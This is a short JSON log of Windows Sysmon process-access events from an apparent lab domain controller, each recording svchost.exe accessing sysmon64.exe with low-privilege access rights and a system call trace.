{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1328,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1329,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1330,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1331,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1332,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1333,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1334,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1335,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
